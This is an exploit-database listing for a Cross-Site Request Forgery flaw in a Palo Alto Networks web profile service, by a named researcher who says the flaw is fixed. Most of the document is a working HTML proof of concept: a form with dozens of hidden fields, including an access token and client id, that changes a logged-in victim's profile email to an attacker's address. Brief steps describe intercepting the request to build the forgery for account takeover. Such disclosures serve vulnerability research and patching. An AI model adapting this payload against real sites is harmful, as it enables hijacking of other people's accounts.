Exploit for Palo Alto Networks Cross Site Request Forgery

Name: Exploit for Palo Alto Networks Cross Site Request Forgery
Rating: 5 (682 reviews)
2019-09-21 | CVSS 0.4
## https://sploitus.com/exploit?id=PACKETSTORM:154559
** Note : this vulnerability is already fixed by paloalto security team  
  
# Exploit Title: Missing CSRF Token Leads to account full takeover (All  
accounts can be hijacked)  
# Google Dork: [N/A]  
# Date: [JUl 23 2019]  
# Exploit Author: Pankaj Kumar Thakur (Nepal) @Nep_1337_1998  
# Vendor Homepage:https://www.paloaltonetworks.com  
# Software Link: N/A  
# Version: [8.0]  
# Tested on: [Parrot OS]  
# CVE : [N/A]  
# Acknowledgement:  
https://www.paloaltonetworks.com/security-researcher-acknowledgement  
  
summary  
----------  
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to  
execute unwanted actions on a web application in which they're currently  
authenticated. CSRF attacks specifically target state-changing requests,  
not theft of data, since the attacker has no way to see the response to the  
forged request.  
  
Steps to generate  
----------------------  
>> Initially account should be authenticated  
  
>> for testing purpose i changed email address ..and account was fully  
takeover  
  
if html files not works then follow this steps  
  
>> go to profile setting  
  
>> change your profile details  
  
>> then intercept that request  
  
>> then generate csrf poc and then try in browser..boom! account  
cresdentials will be changed .  
  
  
PoC  
---  
  
<html>  
<!-- CSRF PoC -->  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="  
https://paloaltonetworks.us.janraincapture.com/widget/profile.jsonp"  
method="POST">  
<input type="hidden" name="utf8" value="Ã¢" />  
<input type="hidden" name="access_token" value="m5xw97v7uy63yqw7"  
/>  
<input type="hidden" name="capture_screen" value="editProfile" />  
<input type="hidden" name="js_version" value="d445bf4" />  
<input type="hidden" name="capture_transactionId"  
value="e3x68i8s4lth5131z1az1zv8nvj4s4laygi5o3m0" />  
<input type="hidden" name="form" value="editProfileForm" />  
<input type="hidden" name="flow" value="customstandardflow" />  
<input type="hidden" name="client_id"  
value="tcdjg4vtnnbm88w8g72x2ajxvxnb4rmm" />  
<input type="hidden" name="redirect_uri"  
value="http://localhost/" />  
<input type="hidden" name="response_type" value="token" />  
<input type="hidden" name="flow_version"  
value="20190502085125375950" />  
<input type="hidden" name="settings_version" value="" />  
<input type="hidden" name="locale" value="en-US" />  
<input type="hidden" name="recaptchaVersion" value="2" />  
<input type="hidden" name="Salutation" value="" />  
<input type="hidden" name="First_Name__c"  
value="EMAIL_HIJACKED" />  
<input type="hidden" name="Middle_Name__c" value="" />  
<input type="hidden" name="Last_Name__c" value="test" />  
<input type="hidden" name="suffix" value="" />  
<input type="hidden" name="Email_Display_Name"  
value="hpankajjj" />  
<input type="hidden" name="Business_Email"  
value="pankajTESTHIJACKED@yopmail.com" />  
<input type="hidden" name="Personal_Email" value="" />  
<input type="hidden" name="Business_Phone" value="9999999999" />  
<input type="hidden" name="MobilePhone" value="" />  
<input type="hidden" name="Company" value="AbeBooks" />  
<input type="hidden" name="Title" value="" />  
<input type="hidden" name="Job_Role__c"  
value="Administrator" />  
<input type="hidden" name="Job_Level__c" value="" />  
<input type="hidden" name="Address1" value="" />  
<input type="hidden" name="Address2" value="" />  
<input type="hidden" name="City" value="" />  
<input type="hidden" name="Zip_or_Postal_Code" value="" />  
<input type="hidden" name="Country" value="India" />  
<input type="hidden" name="Alt_State_Province__c"  
value="" />  
<input type="hidden" name="province" value="" />  
<input type="hidden" name="Preferred_Communication" value="" />  
<input type="hidden" name="language__c" value="en_US" />  
<input type="hidden" name="location__c" value="India" />  
<input type="hidden" name="BreachPrevention_hidden" value="" />  
<input type="hidden" name="BYOD_hidden" value="" />  
<input type="hidden" name="CloudSecurity_hidden" value="" />  
<input type="hidden" name="Cybersecurity_hidden" value="" />  
<input type="hidden" name="DataCenterVirtualization_hidden"  
value="" />  
<input type="hidden" name="EndpointSecurity_hidden" value="" />  
<input type="hidden" name="Firewalls_hidden" value="" />  
<input type="hidden" name="Mobility_hidden" value="" />  
<input type="hidden" name="NetworkSecurity_hidden" value="" />  
<input type="hidden" name="NetworkPerimeter_hidden" value="" />  
<input type="hidden" name="NextGenerationFirewall_hidden"  
value="" />  
<input type="hidden" name="SaaSSecurity_hidden" value="" />  
<input type="hidden" name="ThreatPrevention_hidden" value="" />  
<input type="hidden"  
name="subscribeToNewsAndProductUpdates_hidden" value="" />  
<input type="hidden" name="subscribeToEventsAndWebinars_hidden"  
value="" />  
<input type="hidden"  
name="subscribeToUnit42ThreatResearch_hidden" value="" />  
<input type="hidden" name="tab1complete__c" value="true" />  
<input type="hidden" name="tab2complete__c" value="false" />  
<input type="hidden" name="tab3complete__c" value="false" />  
<input type="hidden" name="tab4complete__c" value="false" />  
<input type="hidden" name="tab5complete__c" value="false" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
THANK YOU  
  
PANKAJ KUMAR THAKUR  
  
INDP.Security Researcher | Certified Ethical Hacker | Red Team at SYNACK  
Inc | OSCP